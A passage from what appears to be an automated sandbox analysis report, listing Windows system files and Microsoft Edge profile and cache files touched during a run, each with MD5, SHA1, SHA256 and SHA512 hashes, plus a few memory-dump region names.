| SHA256 | a14d99c708ff68e6f03e2ccaa60ac806636fddb6eb6102c97b8d78e712335200 |
| SHA512 | 706db0dac431a0b96389505fa52277f952c6514ca8c071cd88c247137f5e40e2db76f91ab8dae95e42561dc97c9da8c13980493aae4c5cd74eb4a5638e3f8817 |
C:\Windows\INF\vdrvroot.PNF
| MD5 | e905a549525568c9faa09a4805bb5f8d |
| SHA1 | 06ae357e7a273aa76b91fe5f97d60406308734fc |
| SHA256 | 3c5615caa6e940dcde3c701f7c612a48ab575f521d00b3d1501ea21212313cdc |
| SHA512 | 86501b8ac99b4d77116b9f6122396e1315d8e91c7114d9b0edb9f9993f832007860148ddef61bc8de850c6678027880f519d75819914711e1c464dd2eb922444 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 812520ccaa421ed1b783b28f189e954d |
| SHA1 | 37e596bcc3b31c5794b085600fd2020258ae1f29 |
| SHA256 | 2023613d60284c6dc92ee3c37e835a02bb744afba3ab7f8a8e9fa8bc8ad5e682 |
| SHA512 | 6a4ba0e18587d3afc41c3ffd97632a25967749f7e0e027e110c28592eee52fd33d3e43b958a1c16eaa077f6c4af011ee33151c4acc484cf0bbeec24f715e443b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ded25efaf2feecfd4fc8324ab19f988f |
| SHA1 | 52561dafb98bd7be1009d0d4eec3829ba285d549 |
| SHA256 | 2fd86ac64dcbeea124588c9bcb49a4e55649ec626e6420b2c79c9eeab54bd410 |
| SHA512 | c3de5a8dd9e2773f5c4f3285ab7ae0611ed480f350b0ea703b4082f733f4af6e65cba4a4f316ccf45123f655defb49a3d04179ebf1cf637925e7fda097b7b583 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 82885ae1050fa86cd11116eee5cbff3f |
| SHA1 | 9d548ad293c83c4d6033729e8b8e62aeb7afe18d |
| SHA256 | 90c7eaa499746d18131277e4ccbfdd16a1c7c301a2eb775be2b37ca8e3881b63 |
| SHA512 | 6ab01549cbd85ee7f4aa54683259c9f8002fb609c9ed7cb4f6a87bf9a0d9c4a5a1b55a861161970c5694a0945c8b480528fafdbad5be57ff4a947f12923818e0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00007b
| MD5 | eef911348f13105f1501b48929ef9224 |
| SHA1 | e8f3fd90ae05a940444a80a6c84cab08245891e3 |
| SHA256 | 5524773f6bb8874ae1ff858bf25ca03e86f90e3a6854448e7f85726b89271da8 |
| SHA512 | ead59bd08d3f11236caf5236ac17fc8af996ec2aa1322d547e26376f7fcc8109db2417b16267cd5f55480b6263fd70fbdabcc67f99c1b1f6385a20ca85f17814 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000078
| MD5 | ab7fc8ab7d76d79285b17b4d9860cbf0 |
| SHA1 | b5833d99bda07236d2ad950fe452cf595fbc3c20 |
| SHA256 | 99933f6af1e17aadc2472a0d537dc4cd9ea565ca56ef5081eb00c806b351083b |
| SHA512 | 200083c436e414fe92512d317cb8434d4fb099ed4075b22e171feb4b379b9b72bbd5a926b5d8040bc0d27d54bb4df5841c509a0a95bb70becfbc5f7d7f5f2daf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 260781b95fced1b137e6b357990d9ff2 |
| SHA1 | d4368f4b48f535bae78c3395684f905a0277e5c3 |
| SHA256 | ba5735ba4126677a539afb532556c387e25dfed07380cc368603212e57d3e998 |
| SHA512 | d34e6a35a8fa03aa1dfcef0d397849ab95ad0244465c45e261951a2a94e6ac4916b9b0361186de64d16bfa794693631b62377187ec6ba1c93aa366a3c254b5a4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | f408d02261df465a35d8c1a3da725414 |
| SHA1 | a60b08b716105980f68fee2bfd64181733d0e168 |
| SHA256 | ed0e9bd02d658778ac00b2f1977fdba04ee660ebe31183253c2c84e0c56acb4f |
| SHA512 | 4aa9f598215f20f9dcc70c1be5c516251f91cd581d01834103fe82bb08e6b87caf88a2aaa63e579f1ea7262410d3d59784883d4ecaeacce61bf1aeeab7c08801 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
memory/2080-894-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp
memory/6892-1110-0x0000000003410000-0x000000000342C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0860093bd1053db073624579ed787ed2 |
| SHA1 | c6bc683827dc31a204dd189e70fd5eee2db5818b |
| SHA256 | b55215256a6e3ef0bff33147b3ab45faecb278eae6b411f282b7550bc53eeeeb |
| SHA512 | 7aaa5c13b562f82649203211303716babe353a834763c060c4b4c47ce9883bb8e36400f722e27b3461e9bd1be22397fcd9d290e1d58fec09c510ca86d35979d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig
| MD5 | 41c1930548d8b99ff1dbb64ba7fecb3d |
| SHA1 | d8acfeaf7c74e2b289be37687f886f50c01d4f2f |
| SHA256 | 16cee17a989167242dd7ee2755721e357dd23bcfcb61f5789cc19deafe7ca502 |
| SHA512 | a684d61324c71ac15f3a907788ab2150f61e7e2b2bf13ca08c14e9822b22336d0d45d9ff2a2a145aa7321d28d6b71408f9515131f8a1bd9f4927b105e6471b75 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 800ee2c635e26e106f21c1bcefef31d1 |
| SHA1 | aeda7f4983fd8b3f25a39aa25fcc83cdbd2dcb8c |
| SHA256 | 94cf0b0505be07e56b77662d9ff49be6a6c57ecf624882f32ea41a521bd27fa2 |
| SHA512 | 3c4860258241a71b07c9a74d4a85f42939206a8baf64169b3f4877f01d4fa3fa61f37cdfda829a73d2310434beb9c04b4a2124c54d8d115080ad9a331eef0aab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | feb5c19c37e690203ccb366ac9c155ec |
| SHA1 | 5fee1e5152680e85e082b16c8f50e3742658d6a1 |
| SHA256 | c88d2fdcb1243666816a3c58ed3f47966f6b5534b527ecc93d6c0a021d1af604 |
| SHA512 | 65d63348c26cc9b9496b7f4a5e2deeedea2f98075a6f556fcdc8690f4f25ae04746eb93335ea132c1a52901e87d394b52d19109a0c639857591334509ee16fde |
memory/5228-3245-0x00000000017B0000-0x00000000017BC000-memory.dmp
memory/5228-3445-0x0000000001640000-0x0000000001652000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | fa52bccbef8587a374ababbfaa0bfadc |
| SHA1 | 17f9a8f6f8e2f07eecc320f5fb4603b8ff299362 |
| SHA256 | 88099fbca515a8062524327d357bc876f53cbf2e88e51ccf26b5568abb64ef4e |
| SHA512 | 06f63e89969158555121322359d9f0165d3f03b0b05609e45c96e0bd3ea29302d2e0f3437677cbd8fb524d7fa40e36f57d5abe70978fdf28f820909313e66ae4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1
| MD5 | d0d388f3865d0523e451d6ba0be34cc4 |
| SHA1 | 8571c6a52aacc2747c048e3419e5657b74612995 |
| SHA256 | 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b |
| SHA512 | 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17 |
memory/5228-4082-0x00007FF97EB00000-0x00007FF97F5C2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2dcc86ddf935a8b7d7e2a92b38e6c45c |
| SHA1 | 04bd935e2a3258a0aa31a0666a6aeef7a2220ca3 |
| SHA256 | 52eaa058f2e0fe178bbf2e967ae52b3885d658bd576ae2d88b5079c6a41dbfaa |
| SHA512 | 6d878192f71ed2094623655e1e6291b015792daaf23ee942e710a05a2ff37cbf40ab19ef631e6c71a2a090734201f736e17179ecac42e2a5f5d12f2142ed9e90 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 24f361e6fecffca1f002067c0750624c |
| SHA1 | 72c4c9dfabbc199aee88b3198a9a4af240919c56 |
| SHA256 | 453da72e60a9f0e467593a4f8482fb0c0081aad4d40b2da5bc740c22f25aab76 |
| SHA512 | 89e3b34866732ca240613ef66d358632ed96f272f323d7f6315eea095f3082ca727b3dd112dc2e0334dbc3b26af34903a8f5028e1265619a92e1f116cfe87ece |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 37fc173d7ed6a4b0a34b278498ef1177 |
| SHA1 | 148b1b304ca7deafa8208748a336e6eff157082e |
| SHA256 | f5d8fb69d3796a7861dc881524df28fdfdfc19197f9f6d6dc886df1c91e4d0c9 |
| SHA512 | 94a7655cbb5273e46ff24d55ddc1d66a3d795b12d8531c6f8b82ef3e1fbdd99b6956de7c16956e4420cc03a5ff0b1ab73e39d11990aadcbbffdbef25743821a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7a58e763f8ce71fb39e0915b95cc2ce2 |
| SHA1 | a207aafa432413eb7bb4b1681db7876c4c0de5e5 |
| SHA256 | 16402981573839750689a8090dd8f25a6d28e8879da35bd0638214555368446b |
| SHA512 | 00c9f69b0a4b8b1b0cbe752c3d8792648f9868316d89b7fa4e57f48a95a7df78736f8bcc2fa90e3055b59f6dd8d2d5932412a6b3c60fdba36761f3325750c77f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 3266cd3f831b5ddee16041fd499e20f2 |
| SHA1 | 768d82daeefcc09bd16e03fdc80f842703362414 |
| SHA256 | f1b4786c49dea572c129a4cf4ce3caedf6d76ffa45788eea86df143e0b556495 |
| SHA512 | 50bc089fe26563eece3018c14db2101628ac81916dbf75c606a2278e9163db7f8858957ba8b47c6f1d7c9c2c07262213bf06ffe7ebe13a705510b649df662b04 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 33fc19561ec1a1a2e3f38cc57520fbe3 |
| SHA1 | 0cf5e8fa90776108e54fb69ba1851946f2080c9e |
| SHA256 | 39d76d2eec3b07a2259abf106bb896c09c7772dd361f74eb070cdbbbec892170 |
| SHA512 | bb55b7f16f6fa39672fecba2ac601ce83a54fbb8fef803c7e4b99048b88ce5f4e2b35623583f76b3fb236f08a12318ab16bcddb62d5f5e4536287a8f5829fb8e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | 9d910699cd1f70ae63d94ce7d1783ed8 |
| SHA1 | 5a26ee437c3d5257bc684864415de74f6c1f9693 |
| SHA256 | 2a4566acd50d116d10c127cf1e4e5c0ec84be9ee15f94ed408dbbdba0369a5a7 |
| SHA512 | 1dace576ebd6ffca6d042e6397bceef97028b70e23d65ee69d2cb945420ab944c5111bb0f62ec28c8e9cdcdde0da87887fd057b4ff843fe35aadbe07133fca71 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\64865635-6cdf-4010-9cbd-157163ae8149.dmp
| MD5 | 51f5fe54d9323faf7e385b67d1e252fd |
| SHA1 | 320dbb708c7d20e59f36dd555ad1b3df651cf145 |
| SHA256 | 20c05f56de25eb522584f35f5f4fce471c903b2db77c96c88d3f53735f83b6c5 |
| SHA512 | 6301c136ad739be9d898044ae153cf91ba130d76b1f8d2f0fa126239a26b534022cff9ae66c2dabdbbd01ee6d20bd927cded43f6165cbf24d0863c5c3aaca3b0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9188d9a0-58ed-456f-a9ae-9f2b81bedb49.dmp
| MD5 | 9d262a13df1d797c8c6800adfe8f4acc |
| SHA1 | 23c0980c6ba991ec88b8b873d73f708fd6b77638 |
| SHA256 | c529016096fd6be9f8cfb76a077c4e807f39dc30902e4587082e7810a33d376f |
| SHA512 | b6dc5e2da1bf4e2cda20c178199bfc73f548525e245c0aa51e3754df3995925edb6ae1eabbf0e8e4e9f854d474ce4395d18d340e1449220a0cbbc0b5f33faf73 |
C:\Windows\System32\wbem\Performance\WmiApRpl.ini
| MD5 | 40b778225a1abcd93b6c03c410599a94 |
| SHA1 | 10a9069ddb6eb032d450894c6c94f85704b1f887 |
| SHA256 | 40dd2732b634f11150bbc2d0fb6ea49ede1928bef97dc028286733134ad53d6e |
| SHA512 | f2c64e4510421d5d8a8dceb37032f0d8dfb2b58808a48b3344ac7e9823be8b3a7bb2b5cd349a6eb8ce53f7e531d42616f275ca7cede0afd6734560377856af55 |
C:\Windows\System32\wbem\Performance\WmiApRpl.h
| MD5 | b133a676d139032a27de3d9619e70091 |
| SHA1 | 1248aa89938a13640252a79113930ede2f26f1fa |
| SHA256 | ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15 |
| SHA512 | c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5 |
C:\Windows\System32\perfc011.dat
| MD5 | 5afbd30597a275ad6d5e98187742c01b |
| SHA1 | 4e9a82a388532a0fcb3671047504384e040b48a1 |
| SHA256 | 26ee1d72642d1d79b307581e6027a259696d5e3299d9d6685153a68b8c58b61b |
| SHA512 | 6d2514d6a12809a7db4901b586b57e03b6e5b0cc4ecd1baeb4f5188ca033773f7ca077fa8e8beadcf82724fd16d9136c0fc252a0163b71a0ff0eae3363f2c0cf |
C:\Windows\System32\perfh007.dat
| MD5 | 3bd8043ff69087c78cf81f0aa082664f |
| SHA1 | c669871201f05f6153dfa3f6a78d4609d818568e |
| SHA256 | d1b8be34dfdff53435bcd3f176f7aa9f17aa8f1145c42edee1ed1eec9faf02b2 |
| SHA512 | a51d2bb5641aaff1ab091a1c331b6e515bb333d2dfa9f09662d35b2315e6fbd14932102167075cd8bdacf7c8f57fe7313f7b1639090070851c2ecf7662384d6d |
C:\Windows\System32\perfc007.dat
| MD5 | 6e71c59a539ba8c2d46c4c8f478edf8c |
| SHA1 | 868558341297d83b247f8be13b375541eb58b886 |
| SHA256 | 4e4e1300a939cc5d58d0c6914410d5ad8eaf876571011fa1c6f0ce27bf59822d |
| SHA512 | 1a86ab970d99430334ba14cc14d75cb902f267e9e15019afcb64400ec6e4335adae3687a5916ccfec5fd0c82c89bfeeac2aed0c6aad693f35e7326f8fb158f9e |
C:\Windows\System32\perfh00A.dat
| MD5 | 3c5c81d56ab201092448ff8a34693c11 |
| SHA1 | 8039450230b36f2927c88b1ddad892968d4c6d2d |
| SHA256 | 885a1cf4c3e9e8f591c04adde5b3ce376da63f3b930d41598a7dd93d77d29984 |
| SHA512 | 4f83f54eb6f5ec2ec3af33d89a94d45c619e6c3521a086015d463f13e4715b127134e8619d7f9bc3b4186a4e28ecc0f7d2cfd0f69bfec000bca686721b52ee11 |
C:\Windows\System32\perfc00A.dat
| MD5 | 6c65a113c1d1dcbc5f7603db0134dcb7 |
| SHA1 | 1eb93cc7aeb12860b63129a69b812b694748a816 |
| SHA256 | 53d617778c1ba174c22b47fd2d84035aa28c58bdcab6c3f3224f3777d1d8e7ee |
| SHA512 | 67c438c141f7d6509db1d0bb17b312b66be8947a623580cc49fcb3000f7e402dda856ab1d422a68bbb25392d00902fef2bd31ce9cc491769205cdd7b31edf605 |
C:\Windows\System32\perfh009.dat
| MD5 | efeeda97e31eb12669293d78feaff451 |
| SHA1 | f3680730a9ed165f49be4a2b1be8477196f15afb |
| SHA256 | a0ae9b96680526dd73b3469504eaeb3882c655e3f4557b9e120de1ddd8edb834 |
| SHA512 | 452da0e9a2c17de87d5a0db150acf299310d684c50c4f16daa5f1c298267d76d990000a0bf4e5ffb2afe5769e74bfcdf351e8d68b933a432a9130cdcdd81f1b2 |
C:\Windows\System32\perfh011.dat
| MD5 | 863ba91012939df532c30c5488298d51 |
| SHA1 | d80edcebaf304b4d104b28679e13b553530af264 |
| SHA256 | 31e30cdffa9c446e11ea98cd909c6c7d52f046be5e472aae006d5f0b1056c15e |
| SHA512 | 20bb28d74d021ec0e17bdc351582c2f9863d048d29bc48663c85c9627bc984082a135ce2e87c0d0327e9932de74f7ab270e6be31e18c5a69e397270462c986bd |
C:\Windows\System32\perfh010.dat
| MD5 | 0b8d19c084f992a57889b8936b811117 |
| SHA1 | 51d119d5e96165647d0e61edf3a27dc359d745a8 |
| SHA256 | d415c78f28d7406a775f95f05b8eabe9dabdc5d99726413741ffdeac9cdedca1 |
| SHA512 | 9928d2cb10f2ea837671a708a449fd5de0dba2e956f418767de8904d6c4e19a95949809dedb2cfb3e6024bc9b2276350aab8413c0ffce5de637a1d1ebf7d2786 |
C:\Windows\System32\perfc010.dat
| MD5 | 8dc506c223e52aa8d5ae3b67e4267693 |
| SHA1 | 14fa11e20c00144a77ace9423b9c5c4c7f01a4a1 |
| SHA256 | be09496098f6caa3f4f947676e85712c8a878e11881c033385f6df67a5e70504 |
| SHA512 | 913e8c796f44c3f295f059980c4f6f622f69ce47ddd50f0ff3fa238dd1f82c4891a2a5e6652744a07bbc4e2579d36a1245af4ca5da7c57b84ef82dfbe5b5dc3b |
C:\Windows\System32\perfh00C.dat
| MD5 | aa5aeb4bbeb6a920eee5ec1ded28afcd |
| SHA1 | e152f8c921398b943ce7a3d10b339c681abb804d |
| SHA256 | 56a92a49d4d27b30ce6d665ea146431a020f83a1da86fb653978f1d0b2034c91 |
| SHA512 | 5ac85b0ff778ea1b435fa5d43943e09fce743dcce8e2f06a8b5936cbfff6ca6df07a296bf5df1f2313696b9c294d69538face50145b1f0646a40b3678db89228 |
C:\Windows\System32\perfc00C.dat
| MD5 | cfe82aa29b3eccbedfd99ba507fb70b5 |
| SHA1 | 1046e8d16eeaeb4a517119f3b0d4c3428e25f60a |
| SHA256 | acf6a8a25384353ce650843f5822bbf5e53dfb9485ae5454daef099088924b65 |
| SHA512 | 7dbcd22e25357a400873cb80b474304a3fb67ac4fa6f6236f3cb5117d43e1c176e676c57042cfb2410f811cbdca602a56df0842610355defe7174439bb54877b |